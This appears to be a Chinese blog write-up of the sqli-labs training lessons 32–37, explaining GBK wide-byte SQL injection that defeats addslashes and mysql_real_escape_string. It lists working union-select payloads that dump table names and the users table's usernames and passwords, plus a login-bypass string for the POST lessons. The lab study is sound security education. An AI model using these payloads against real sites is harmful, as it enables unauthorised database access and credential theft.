Sqli-labs Less32-Less33 宽字节注入

于 2024-07-25 19:06:13 发布
阅读量631 收藏 15
点赞数 31
分类专栏: # Sqli-labs 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beiweixiaotian66/article/details/140697615
版权

文章目录

宽字节注入

什么是宽字节?

如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节

  • 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节
  • 英文默认占一个字节,中文占两个字节

宽字节注入原理

sql注入很关键的一步就是让引号闭合和跳出引号,如果无法跳出引号,那么你输入的内容就永远在引号里,你输出的内容就永远都是字符串

php里面有个转义符\对输入的敏感信息和特殊字符进行转义

就是的单引号' 被转义后变成了\'那么我们输入的内容被转义后就之被当作了一个字符串,无法实现包裹字符串的作用了,所以宽字节注入就是让转义失去转义的作用

\转义符通过编码为%5c,找到另一半让他们组成一个新的字符%df%5c就行了

%df与反斜杠的 URL 编码 %5C 闭合,从而构成 GBK 国标码中的汉字“連”,使得用于转义的反斜杠被我们“吃掉”了。

Less_32

sqli-labs - 随笔分类

image-20240719143802349

可以看到虽然输入?id=1'的时候页面没有报错,但是可以看到我们的单引号是被转义掉了的

在使用单引号的时候使用宽字节注入即可

?id=1%df' order by 4--+
?id=-1%df' union select 1,database(),3--+
?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
注意此处数据库名要用十六进制 (HEX) 编码替代,避免单引号的使用。
?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+
?id=-1%df' union select 1,group_concat(username,password),3 from security.users--+

image-20240719145526594

Less_33

和上道题一样,还是单引号注入,但是对单引号进行了转义

image-20240719145915235

function check_addslashes($string)
{
    $string= addslashes($string);    
    return $string;
}

看一下源码

addslashes:返回需要在转义字符前添加反斜线的字符串:
这些字符是
单引号(')
双引号(")
反斜线(\)
NUL(NUL 字节)

还是用%df将其绕过即可

Less_34

这道题是一个POST型的注入,也同样的对单引号进行了转义的处理,上面我们是将过滤函数添加的\给吃掉了。但是 get型的方式我们是以url的形式提交的,因此数据会通过URLencode。

若要用到post型的注入中,我们将utf-8转换成utf-16或者utf-32 可以将 ' 转为utf-16变成 �

image-20240719151036534

用万能密码�' or 1=1#

image-20240719151950390

可以看到成功登录

原始的sql语句为:

SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1

然后输入后变成了

SELECT username, password FROM users WHERE username='�' or 1=1#' and password='1' LIMIT 0,1

可以看到前面成功闭合,然后#将后面的语句给注释掉了,所以成功登录

Less_35

可以先尝试一下

然后查看源码:

SELECT * FROM users WHERE id=$id LIMIT 0,1

可以看到id并没有被'和 " 所包围,所以其实可以不用管addslashes函数

然后按第一题的方式写就行

?id=1 order by 4--+
?id=-1 union select 1,database(),3--+
?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
?id=-1 union select 1,group_concat(username,password),3 from security.users--+

Less_36

还是单引号注入,进行了字符的转义,进行宽字节注入就行,还是用上面的方法写

image-20240719153405653

查看一下源代码:

function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    
    return $string;
}

check_quotes函数利用mysql_real_escape_string函数进行过滤

mysql_real_escape_string — 将字符串中的特殊字符进行转义,以在 SQL 语句中使用

在以下字符前添加反斜线:\x00\n\r\'"\x1a

Less_37

可以用34题的万能密码

因为与34题不同的只有函数过滤的方法不同

34题是addslashes

37题是mysql_real_escape_string,但是原理是差不多的

然后也可以抓个包

uname=1%df'&passwd=1&submit=Submit有报错信息

注释掉后,发现登陆错误

image-20240719155540750

uname=1%df' order by 3--+&passwd=1&submit=Submit
uname=-1%df' union select 1,2
uname=-1%df' union select 1,database()--+&passwd=1&submit=Submit
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1&submit=Submit
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+&passwd=1&submit=Submit
uname=-1%df' union select 1,group_concat(username,password) from security.users--+&passwd=1&submit=Submit
Cyan1u
关注
  • 31
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 1312
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
sqli-labs(字节less-33,二次less-24,update less-17,堆叠less-38)pikachu(insert,delete)
weixin_74182283的博客
04-03 711
堆叠注入可以执行的是任意的语句。x' or updatexml(1,concat(0x7e,version(),0x7e),1) or '1‘=’1 填入两个必填的字段ps(or前面的那个x可写可不写,只是用来装作一个用户,让前面闭合的语句为假而已,我就没写,别想太多。也先瞅眼代码◕‿◕,可以看到这里也进行了相关的过滤,比如这个substr 意味着如果使用substr只能截取0-15个的字符,后面这个strip是过滤了\,来防止一些转义字符的替换,下面那个就是上面字节的函数,也进行了限制。
(手工)【sqli-labs35】字节、数字型、编码、报错注入
07-14 755
SQL-字节、编码、数字型注入】
sql-labs闯关32~37
qq_44663230的博客
09-04 2096
sql-labs闯关32~37 宽字节注入集合
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 8914
渗透测试-SQL注入之宽字节注入
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
sql注入】宽字节注入详解
最新发布
Yuppie001的博客
04-14 1074
1.什么是字节?2.宽字节注入原理二.sqli-labs-36关。
sql_labsqli中的宽字节注入(less32
qq_59020256的博客
12-23 550
id=-1%df' union select 1,2,3 -- s 记住前面要加 - 因为不加 - 则会正常查询第一个数不会执行联合查询。8.查username和password。爆出security里面的table表。4.用union联合查询判断回显点。出现 \’ 则证明是宽字节注入宽字节注入(less-32)显示登录成功则构成闭环。
sqli-labs/less-24;宽字节注入
xiaochenhang的博客
08-18 346
2、 当数据库的编码为GBK时,可以使用宽字节注入字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸。1、在使用gbk的编码情况下,一个中文占了两个字节;中文的第一个字节加上被转义的特殊字符(\')后,转义符\会被认为是中文的第二个字节,这样单引号'就脱离了转义,形成了宽字节注入;这个语句没问题,可是'security' 两侧单引号也会被转义,这里使用嵌套查询来逃逸;4、联合查询,判断回显点;...
sqli-labs————宽字节注入(可以用于绕过滤了单引号或者\的WAF)
Fly_鹏程万里
05-19 2611
宽字节注入的原理:原理:mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤 ' 的时候,往往利用的思路是将 ' 转换为 \' 。宽字节注入实现:因此我们在此想办法将 ' 前面添加的 \ 除掉,一般有两种思路:(1)%df吃掉 \ 具体的原因是urlencode('\) = %5c%27,我们在%5c%...
sqli-labs————Less-34(字节绕过、水平越权、盲注)
Fly_鹏程万里
05-19 2568
Less-34方法一:这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: �'。我们可以利用这一点注...
SQL注入:sqli-labs 32 宽字节注入
Zeker62的博客
08-12 467
http://127.0.0.1/sqli/Less-32/?id=1不报错 http://127.0.0.1/sqli/Less-32/?id=1'发现下面的信息框里面多了一个转义字符: Hint: The Query String you input is escaped as : 1’ The Query String you input in Hex becomes : 315c27 再尝试:http://127.0.0.1/sqli/Less-32/?id=1"发现仍然被转义。 显然第二行显示信.
Sqli-labs Less32-37 宽字节注入绕过过滤函数
kevinhanser
08-10 2208
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 32: GET - Bypass custom filter adding slashes to dangerous chasrs 原理 mysql 在使用GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个ascii 码大于128 才能到汉字的范围)。我们在...
宽字节注入& Sqli-labs Less 32
信安小菜鸡的博客
05-01 200
宽字节注入 宽字节注入值得是当设置GBK编码后,遇到两个连续字节都符合GBK取值范围时会自动解析为一个汉字,从而达到将原来得过滤字符去掉的效果 如图所示,id=1’单引号被自动过滤为\,导致参数始终被单引号包围无法逃逸。 此时若编码为GBK可以使用宽字节注入,通过先增加GBK编码使得反斜杠失效 如下图,反斜杠编码为%5c,GBK编码中%df%5c为某繁字体,此时单引号成功逃逸,从而能够进行后续注入。 Sqli-labs Less 32 测试发现单引号被转义为斜杠和单引号,因此只需要消除斜杠 同理加上%
利用布尔注入:SQLi-Labs less16实战脚本
本文档详细介绍了如何结合手工注入的方法编写一个针对SQL盲注的脚本,以SQLi-Labs的Less16环境为例。首先,作者通过抓包技术来分析测试注入点,观察响应数据包的变化,利用"1')or1=1--#"这种经典的布尔型SQL注入手法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值